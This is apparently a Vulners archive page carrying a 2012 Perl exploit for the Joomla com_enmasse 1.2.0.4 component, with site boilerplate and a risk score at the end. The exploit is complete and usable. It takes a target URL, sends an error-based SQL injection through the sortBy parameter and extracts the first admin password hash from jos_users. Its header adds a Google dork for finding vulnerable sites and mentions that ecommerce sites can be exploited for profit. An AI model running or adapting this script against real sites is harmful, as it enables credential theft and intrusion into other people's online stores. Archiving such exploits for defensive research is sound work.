Vulners
Lucene search
Joomla! Component com_enmasse 1.2.0.4 - SQL Injection
# Exploit Title: Joomla com_enmasse Remote Exploit
# Author: Daniel Barragan "D4NB4R"
# Español
# hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra
# de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es
# posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por
# defecto de joomla.
# English
# hi, this exploit affects ecommerce sites so the exploit only give a sample of the
# possible extraction of data, I am not responsible for any use that is given. since
# it is possible to obtain economic profit through this. the script is done with joomla default tables.
#!/usr/bin/perl -w
########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://poisonsecurity.wordpress.com/
#
# Vendor: http://www.matamko.com/
#
# Version: 1.2.0.4 (last update on Jul 27, 2012)
#
# License: Enmasse 6 Months Support & Subscription - USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";
use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$concatene="concat(password)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) {
print "\n Hash Admin : $1\n\n";
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
print " The exploit was successful if you want to see more data modify the script\n";
}
else{print "\n[-] No se pudo, intente manualmente\n";}
#####Daniel Barragan D4NB4R 2012################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Aug 2012 00:00Current
7High risk
Vulners AI Score7